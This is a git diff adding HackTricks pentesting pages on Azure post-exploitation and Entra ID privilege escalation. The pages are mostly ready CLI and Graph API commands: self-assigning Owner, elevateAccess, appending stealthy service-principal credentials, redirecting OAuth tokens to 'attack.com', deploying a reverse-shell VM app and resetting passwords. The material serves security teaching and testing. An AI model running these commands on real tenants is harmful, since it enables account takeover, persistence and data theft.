+az servicebus queue update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`)
+
+An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation.
+
+{% code overflow="wrap" %}
+```bash
+az servicebus topic create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
+az servicebus topic update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
+```
+{% endcode %}
+
+### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`)
+
+An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios.
+
+
+{% code overflow="wrap" %}
+```bash
+az servicebus topic subscription create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
+az servicebus topic subscription update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
+```
+{% endcode %}
+
+
+### Actions: `AuthorizationRules` Send & Recive Messages
+
+Take a look here:
+
+{% content-ref url="../az-services/az-queue-privesc.md" %}
+[az-queue-privesc.md](../az-services/az-queue-privesc.md)
+{% endcontent-ref %}
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
+* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
+* https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest
+* https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
new file mode 100644
index 0000000000..50e25c217f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
@@ -0,0 +1,90 @@
+# Az - Table Storage Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Table Storage Privesc
+
+For more information about table storage check:
+
+{% content-ref url="../az-services/az-table-storage.md" %}
+[az-table-storage.md](../az-services/az-table-storage.md)
+{% endcontent-ref %}
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read
+
+A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**.
+
+```bash
+# List tables
+az storage table list --auth-mode login --account-name <name>
+
+# Read table (top 10)
+az storage entity query \
+    --account-name <name> \
+    --table-name <t-name> \
+    --auth-mode login \
+    --top 10
+```
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action
+
+A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it).
+
+* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions.
+* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries
+* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries
+
+```bash
+# Add
+az storage entity insert \
+  --account-name <acc-name> \
+  --table-name <t-name> \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Replace
+az storage entity replace \
+  --account-name <acc-name> \
+  --table-name <t-name> \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Update
+az storage entity merge \
+  --account-name <acc-name> \
+  --table-name <t-name> \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+```
+
+### \*/delete
+
+This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
new file mode 100644
index 0000000000..08e4f5319b
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
@@ -0,0 +1,210 @@
+# Az - VMs & Network Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## VMs & Network
+
+For more info about Azure VMs and networking check the following page:
+
+{% content-ref url="../az-services/vms/" %}
+[vms](../az-services/vms/)
+{% endcontent-ref %}
+
+### VM Application Pivoting
+
+VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**.
+
+### Sensitive information in images
+
+It might be possible to find **sensitive information inside images** taken from VMs in the past.
+
+1. **List images** from galleries
+
+```bash
+# Get galleries
+az sig list -o table
+
+# List images inside gallery
+az sig image-definition list \
+  --resource-group <RESOURCE_GROUP> \
+  --gallery-name <GALLERY_NAME> \
+  -o table
+
+# Get images versions
+az sig image-version list \
+  --resource-group <RESOURCE_GROUP> \
+  --gallery-name <GALLERY_NAME> \
+  --gallery-image-definition <IMAGE_DEFINITION> \
+  -o table
+```
+
+2. **List custom images**
+
+```bash
+az image list -o table
+```
+
+3. **Create VM from image ID** and search for sensitive info inside of it
+
+```bash
+# Create VM from image
+az vm create \
+  --resource-group <RESOURCE_GROUP> \
+  --name <VM_NAME> \
+  --image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
+  --admin-username <ADMIN_USERNAME> \
+  --generate-ssh-keys
+```
+
+### Sensitive information in restore points
+
+It might be possible to find **sensitive information inside restore points**.
+
+1. **List restore points**
+
+```bash
+az restore-point list \
+  --resource-group <RESOURCE_GROUP> \
+  --restore-point-collection-name <COLLECTION_NAME> \
+  -o table
+```
+
+2. **Create a disk** from a restore point
+
+{% code overflow="wrap" %}
+```bash
+az disk create \
+  --resource-group <RESOURCE_GROUP> \
+  --name <NEW_DISK_NAME> \
+  --source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
+```
+{% endcode %}
+
+3. **Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already)
+
+```bash
+az vm disk attach \
+  --resource-group <RESOURCE_GROUP> \
+  --vm-name <VM_NAME> \
+  --name <DISK_NAME>
+```
+
+4. **Mount** the disk and **search for sensitive info**
+
+{% tabs %}
+{% tab title="Linux" %}
+```bash
+# List all available disks
+sudo fdisk -l
+
+# Check disk format
+sudo file -s /dev/sdX
+
+# Mount it
+sudo mkdir /mnt/mydisk
+sudo mount /dev/sdX1 /mnt/mydisk
+```
+{% endtab %}
+
+{% tab title="Windows" %}
+#### **1. Open Disk Management**
+
+1. Right-click **Start** and select **Disk Management**.
+2. The attached disk should appear as **Offline** or **Unallocated**.
+
+#### **2. Bring the Disk Online**
+
+1. Locate the disk in the bottom pane.
+2. Right-click the disk (e.g., **Disk 1**) and select **Online**.
+
+#### **3. Initialize the Disk**
+
+1. If the disk is not initialized, right-click and select **Initialize Disk**.
+2. Choose the partition style:
+   * **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems.
+
+#### **4. Create a New Volume**
+
+1. Right-click the unallocated space on the disk and select **New Simple Volume**.
+2. Follow the wizard to:
+   * Assign a drive letter (e.g., `D:`).
+   * Format the disk (choose NTFS for most cases).
+{% endtab %}
+{% endtabs %}
+
+### Sensitive information in disks & snapshots
+
+It might be possible to find **sensitive information inside disks or even old disk's snapshots**.
+
+1. **List snapshots**
+
+```bash
+az snapshot list \
+  --resource-group <RESOURCE_GROUP> \
+  -o table
+```
+
+2. **Create disk from snapshot** (if needed)
+
+```bash
+az disk create \
+  --resource-group <RESOURCE_GROUP> \
+  --name <DISK_NAME> \
+  --source <SNAPSHOT_ID> \
+  --size-gb <DISK_SIZE>
+```
+
+3. **Attach and mount the disk** to a VM and search for sensitive information (check the previous section to see how to do this)
+
+### Sensitive information in VM Extensions & VM Applications
+
+It might be possible to find **sensitive information inside VM extensions and VM applications**.
+
+1. **List all VM apps**
+
+{% code overflow="wrap" %}
+```bash
+## List all VM applications inside a gallery
+az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
+```
+{% endcode %}
+
+2. Install the extension in a VM and **search for sensitive info**
+
+{% code overflow="wrap" %}
+```bash
+az vm application set \
+   --resource-group <rsc-group> \
+   --name <vm-name> \
+   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
+   --treat-deployment-as-failure true
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/README.md
new file mode 100644
index 0000000000..1aa36a8cfd
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/README.md
@@ -0,0 +1,2 @@
+# Az - Privilege Escalation
+
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
new file mode 100644
index 0000000000..8a6e79d19e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
@@ -0,0 +1,99 @@
+# Az - Azure IAM Privesc (Authorization)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Azure IAM
+
+Fore more information check:
+
+{% content-ref url="../az-services/az-azuread.md" %}
+[az-azuread.md](../az-services/az-azuread.md)
+{% endcontent-ref %}
+
+### Microsoft.Authorization/roleAssignments/write
+
+This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
+
+{% code overflow="wrap" %}
+```bash
+# Example
+az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
+```
+{% endcode %}
+
+### Microsoft.Authorization/roleDefinitions/Write
+
+This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
+
+Create the file `role.json` with the following **content**:
+
+```json
+{
+  "Name": "<name of the role>",
+  "IsCustom": true,
+  "Description": "Custom role with elevated privileges",
+  "Actions": [
+    "*"
+  ],
+  "NotActions": [],
+  "DataActions": [
+    "*"
+  ],
+  "NotDataActions": [],
+  "AssignableScopes": [
+    "/subscriptions/<subscription-id>"
+  ]
+}
+```
+
+Then update the role permissions with the previous definition calling:
+
+```bash
+az role definition update --role-definition role.json
+```
+
+### Microsoft.Authorization/elevateAccess/action
+
+This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
+
+{% hint style="success" %}
+I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Call elevate
+az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
+
+# Grant a user the Owner role
+az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
new file mode 100644
index 0000000000..533dd93bce
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -0,0 +1,398 @@
+# Az - EntraID Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+{% hint style="info" %}
+Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.**
+{% endhint %}
+
+## Roles
+
+### Role: Privileged Role Administrator <a href="#c9d4cde0-7dcc-45d5-aa95-59d198ae84b2" id="c9d4cde0-7dcc-45d5-aa95-59d198ae84b2"></a>
+
+This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges.
+
+* Assign role to a user:
+
+```bash
+# List enabled built-in roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directoryRoles"
+  
+# Give role (Global Administrator?) to a user
+roleId="<roleId>"
+userId="<userId>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
+  --headers "Content-Type=application/json" \
+  --body "{
+    \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
+  }"
+```
+
+* Add more permissions to a role:
+
+```bash
+# List only custom roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
+
+# Change the permissions of a custom role
+az rest --method PATCH \
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \ 
+  --headers "Content-Type=application/json" \
+  --body '{
+    "description": "Update basic properties of application registrations",
+    "rolePermissions": [
+      {
+        "allowedResourceActions": [
+          "microsoft.directory/applications/credentials/update"
+        ]
+      }
+    ]
+  }'
+```
+
+## Applications
+
+### `microsoft.directory/applications/credentials/update`
+
+This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges.
+
+```bash
+# Generate a new password without overwritting old ones
+az ad app credential reset --id <appId> --append
+# Generate a new certificate without overwritting old ones
+az ad app credential reset --id <appId> --create-cert
+```
+
+### `microsoft.directory/applications.myOrganization/credentials/update`
+
+This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications.
+
+```bash
+az ad app credential reset --id <appId> --append
+```
+
+### `microsoft.directory/applications/owners/update`
+
+By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions.
+
+```bash
+az ad app owner add --id <AppId> --owner-object-id <UserId>
+az ad app credential reset --id <appId> --append
+
+# You can check the owners with
+az ad app owner list --id <appId>
+```
+
+### `microsoft.directory/applications/allProperties/update`
+
+An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything.
+
+Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions.
+
+{% code overflow="wrap" %}
+```bash
+# Get current redirect uris
+az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
+# Add a new redirect URI (make sure to keep the configured ones)
+az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback" 
+```
+{% endcode %}
+
+## Service Principals
+
+### `microsoft.directory/servicePrincipals/credentials/update`
+
+This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges.
+
+```bash
+az ad sp credential reset --id <sp-id> --append
+```
+
+{% hint style="danger" %}
+The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\
+From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
+{% endhint %}
+
+If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute:
+
+{% code overflow="wrap" %}
+```bash
+az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'
+```
+{% endcode %}
+
+### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
+
+This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges.
+
+```bash
+az ad sp credential reset --id <sp-id> --append
+```
+
+### `microsoft.directory/servicePrincipals/owners/update`
+
+Similar to applications, this permission allows to add more owners to a service principal. Owning a service principal allows control over its credentials and permissions.
+
+```bash
+# Add new owner
+spId="<spId>"
+userId="<userId>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
+  --headers "Content-Type=application/json" \
+  --body "{
+    \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
+  }"
+
+az ad sp credential reset --id <sp-id> --append
+
+# You can check the owners with
+az ad sp owner list --id <spId>
+```
+
+{% hint style="danger" %}
+After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**.
+{% endhint %}
+
+### `microsoft.directory/servicePrincipals/disable` and `enable`
+
+These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges.
+
+Note that for this technique the attacker will need more permissions in order to take over the enabled service principal.
+
+```bash
+bashCopy code# Disable
+az ad sp update --id <ServicePrincipalId> --account-enabled false
+
+# Enable
+az ad sp update --id <ServicePrincipalId> --account-enabled true
+```
+
+#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`
+
+These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications.
+
+{% code overflow="wrap" %}
+```bash
+# Generate SSO creds for a user or a group
+spID="<spId>"
+user_or_group_id="<id>"
+username="<username>"
+password="<password>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
+  --headers "Content-Type=application/json" \
+  --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"
+
+
+# Get credentials of a specific credID
+credID="<credID>"
+az rest --method POST \
+  --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
+  --headers "Content-Type=application/json" \
+  --body "{\"id\": \"$credID\"}"
+```
+{% endcode %}
+
+***
+
+## Groups
+
+### `microsoft.directory/groups/allProperties/update`
+
+This permission allows to add users to privileged groups, leading to privilege escalation.
+
+```bash
+az ad group member add --group <GroupName> --member-id <UserId>
+```
+
+**Note**: This permission excludes Entra ID role-assignable groups.
+
+### `microsoft.directory/groups/owners/update`
+
+This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group.
+
+```bash
+az ad group owner add --group <GroupName> --owner-object-id <UserId>
+az ad group member add --group <GroupName> --member-id <UserId>
+```
+
+**Note**: This permission excludes Entra ID role-assignable groups.
+
+### `microsoft.directory/groups/members/update`
+
+This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access.
+
+```bash
+az ad group member add --group <GroupName> --member-id <UserId>
+```
+
+### `microsoft.directory/groups/dynamicMembershipRule/update`
+
+This permission allows to update membership rule in a dynamic group. An attacker could modify dynamic rules to include himself in privileged groups without explicit addition.
+
+```bash
+groupId="<group-id>"
+az rest --method PATCH \
+  --uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
+  --headers "Content-Type=application/json" \
+  --body '{
+    "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
+    "membershipRuleProcessingState": "On"
+  }'
+```
+
+**Note**: This permission excludes Entra ID role-assignable groups.
+
+### Dynamic Groups Privesc
+
+It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check:
+
+{% content-ref url="dynamic-groups.md" %}
+[dynamic-groups.md](dynamic-groups.md)
+{% endcontent-ref %}
+
+## Users
+
+### `microsoft.directory/users/password/update`
+
+This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. This permission cannot be assigned to custom roles.
+
+```bash
+az ad user update --id <user-id> --password "kweoifuh.234"
+```
+
+### `microsoft.directory/users/basic/update`
+
